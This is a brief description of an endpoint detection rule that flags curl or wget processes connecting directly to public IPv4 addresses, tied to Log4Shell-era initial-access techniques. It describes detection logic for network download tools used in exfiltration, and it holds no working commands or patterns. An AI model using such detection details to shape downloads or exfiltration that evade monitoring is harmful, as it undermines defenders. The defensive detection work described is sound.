This detection rule is implemented to identify suspicious use of the CURL or WGET commands on Linux and macOS endpoints. It specifically looks for instances where these commands attempt to connect directly to an IPv4 address, as opposed to a domain name. The detection logic is detailed with a focus on processes that match specific patterns. It employs multiple regular expressions to capture the presence of CURL or WGET commands in the process line, coupled with checks to ensure that the target IP address is not part of local or private address ranges, which may indicate legitimate network activity. This rule was initially conceived in response to vulnerabilities exposed by CVE-2021-44228, linked to exploits that leverage command-line tools for initial access into systems. By monitoring process logs from the endpoint, security teams can gain insights into unauthorized data exfiltration or malicious downloads that could compromise system integrity.